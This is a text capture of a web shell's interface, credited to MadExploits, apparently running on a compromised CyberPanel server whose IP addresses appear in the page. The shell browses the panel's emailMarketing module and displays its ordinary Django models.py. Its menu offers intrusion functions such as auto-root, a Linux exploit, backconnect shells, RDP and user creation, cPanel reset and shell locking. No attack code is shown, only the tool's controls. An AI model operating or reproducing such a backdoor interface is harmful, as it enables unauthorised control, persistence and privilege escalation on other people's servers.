Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
emailMarketing /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
__init__.py
63
B
-rw-r--r--
admin.py
89
B
-rw-r--r--
apps.py
180
B
-rw-r--r--
emACL.py
1.7
KB
-rw-r--r--
emailMarketing.py
21.24
KB
-rw-r--r--
emailMarketingManager.py
31.13
KB
-rw-r--r--
meta.xml
235
B
-rw-r--r--
models.py
2.08
KB
-rw-r--r--
signals.py
0
B
-rw-r--r--
tests.py
86
B
-rw-r--r--
urls.py
2.04
KB
-rw-r--r--
views.py
5.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : models.py
# -*- coding: utf-8 -*- from django.db import models from websiteFunctions.models import Websites from loginSystem.models import Administrator # Create your models here. class EmailMarketing(models.Model): userName = models.CharField(max_length=50, unique=True) class EmailLists(models.Model): owner = models.ForeignKey(Websites, on_delete=models.PROTECT) listName = models.CharField(max_length=50, unique=True) dateCreated = models.CharField(max_length=200) verified = models.IntegerField(default=0) notVerified = models.IntegerField(default=0) class EmailsInList(models.Model): owner = models.ForeignKey(EmailLists, on_delete=models.CASCADE) email = models.CharField(max_length=50) firstName = models.CharField(max_length=20, default='') lastName = models.CharField(max_length=20, default='') verificationStatus = models.CharField(max_length=100) dateCreated = models.CharField(max_length=200) class SMTPHosts(models.Model): owner = models.ForeignKey(Administrator, on_delete=models.CASCADE) host = models.CharField(max_length=150, unique= True) port = models.CharField(max_length=10) userName = models.CharField(max_length=200) password = models.CharField(max_length=200) class EmailTemplate(models.Model): owner = models.ForeignKey(Administrator, on_delete=models.CASCADE) name = models.CharField(unique=True, max_length=100) subject = models.CharField(max_length=1000) fromName = models.CharField(max_length=100) fromEmail = models.CharField(max_length=150) replyTo = models.CharField(max_length=150) emailMessage = models.TextField(max_length=65532) class EmailJobs(models.Model): owner = models.ForeignKey(EmailTemplate, on_delete=models.CASCADE) date = models.CharField(max_length=200) host = models.CharField(max_length=1000) totalEmails = models.IntegerField() sent = models.IntegerField() failed = models.IntegerField() class ValidationLog(models.Model): owner = models.ForeignKey(EmailLists, on_delete=models.CASCADE) status = models.IntegerField() message = models.TextField()
Close